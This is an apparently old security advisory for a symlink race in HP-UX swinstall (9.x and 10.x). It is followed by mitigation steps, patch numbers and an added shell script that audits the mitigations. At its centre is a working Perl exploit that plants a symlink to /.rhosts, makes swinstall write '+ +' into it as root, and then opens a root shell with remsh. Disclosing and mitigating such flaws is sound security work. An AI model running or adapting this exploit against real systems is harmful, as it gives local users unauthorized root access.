COMMAND

    /usr/sbin/swinstall

SYSTEMS AFFECTED

    HP-UX 9.X and 10.X

PROBLEM

    The programs supplied with this package create files in an
    insecure manner.  As these programs execute with root privileges,
    local users may be able to create or over-write arbitrary files
    on the system.  This can be leveraged to gain root privileges.
    It will also create any file you like, and it will do so with
    mode 666.  Here is the exploit for the .rhosts file (+ +).
    Credit goes to SOD.

------------------------------------------------------------------------------
#!/usr/bin/perl

# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..

$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
  print STDERR "I can only work on systems that have swinstall loaded..\n";
  print STDERR "Yours doesn't seem to...\n";
  exit;
  };

if ($#ARGV<0) {
  $newfile="/.rhosts";
  } else {
  $newfile="$ARGV[0]";
  }

if (-f "$newfile") {
  print STDERR "$newfile exists!\n";
  print STDERR "I can only make files that don't already exist..\n";
  exit;
  }

open(UNAME,"uname -r|");
chop($uname=<UNAME>);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);

print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
  system("remsh localhost -l root ksh -i");
  } else {
  system(">$newfile;ls -l $newfile");
  }
------------------------------------------------------------------------------

SOLUTION


    When  not  being  used,  the  program  should be either removed or
    disabled to prevent it from being used for malicious purposes.  To
    disable the program, change  the permissions to owner  only access
    and clear the suid bit.  Ensure that swinstall is owned by root.
    Only root will then be able to do program installations.

        # chmod 400 /usr/sbin/swinstall
        # chmod 400 /usr/sbin/swmodify

    If packages must be installed, the machine should be brought into
    single-user mode and execute permissions re-enabled on
    /usr/sbin/swinstall:

        # chmod 700 /usr/sbin/swinstall
        # chmod 700 /usr/sbin/swmodify

    The  SD-UX  programs  use  a  number  of  temporary  files.    The
    location of these  files can be  configured using the  environment
    variable TMPDIR.  It is  possible to set the environment  variable
    TMPDIR to a  non-world writable directory.   Having the  temporary
    files  created  in  a  non-world  writable  directory prevents the
    exploitation of the vulnerability.
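
    The permission changes and the TMPDIR setting above can be checked
    with a short script.  This is an added example, not part of the
    original advisory or of HP's tooling; the function names and the
    /var/tmp default for an unset TMPDIR are assumptions of the example.

```shell
#!/bin/sh
# Added example: audit the mitigations from the SOLUTION section.
# Function names are this example's own; run the audit as root on the host.

# Print the 10-character mode field from ls, e.g. "-r-sr-xr-x".
mode_string() {
    ls -ld "$1" 2>/dev/null | awk '{print substr($1, 1, 10)}'
}

# Print the numeric owner uid of a path.
owner_uid() {
    ls -ldn "$1" 2>/dev/null | awk '{print $3}'
}

# 0 = owner-only access and no setuid bit; 1 = still exposed; 2 = missing.
binary_locked_down() {
    m=$(mode_string "$1")
    [ -n "$m" ] || return 2
    case "$m" in
        ???[sS]*)   return 1 ;;   # setuid bit still set
        ????------) return 0 ;;   # what chmod 400 / chmod 700 leaves
        *)          return 1 ;;   # group or other can still read or execute
    esac
}

# 0 = a real directory (not a symlink) that is not world-writable.
tmpdir_safe() {
    m=$(mode_string "$1")
    case "$m" in
        d???????w?) return 1 ;;   # world-writable, e.g. /var/tmp or /usr/tmp
        d*)         return 0 ;;
        *)          return 1 ;;   # missing, a symlink, or not a directory
    esac
}

audit() {
    for b in /usr/sbin/swinstall /usr/sbin/swmodify; do
        if binary_locked_down "$b"; then rc=0; else rc=$?; fi
        case $rc in
            0) [ "$(owner_uid "$b")" = 0 ] && echo "OK    $b" || echo "WARN  $b not owned by root" ;;
            1) echo "WARN  $b: setuid set or group/other access" ;;
            2) echo "INFO  $b not present" ;;
        esac
    done
    t=${TMPDIR:-/var/tmp}         # assumed default when TMPDIR is unset
    tmpdir_safe "$t" && echo "OK    TMPDIR=$t" || echo "WARN  TMPDIR=$t is world-writable or not a directory"
}

if [ "${1:-}" = "--audit" ]; then audit; fi
```

    Run it with --audit from the same environment in which swinstall
    will be started, so that the TMPDIR it inspects is the one the
    SD-UX programs will see.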

    If you use this, apply the following patches as needed:

        PHCO_10652 for HP-UX release 10.00 and 10.01,
        PHCO_10028 for HP-UX release 10.10,
        PHCO_11004 for HP-UX release 10.20,
        PHCO_11185 for HP-UX release 10.16,
        PHCO_11183 for HP-UX release 10.24.
        For SD OV (released on 9.X):
        PHCO_11162 for 9.0[04],
        PHCO_11161 for 9.0[1357].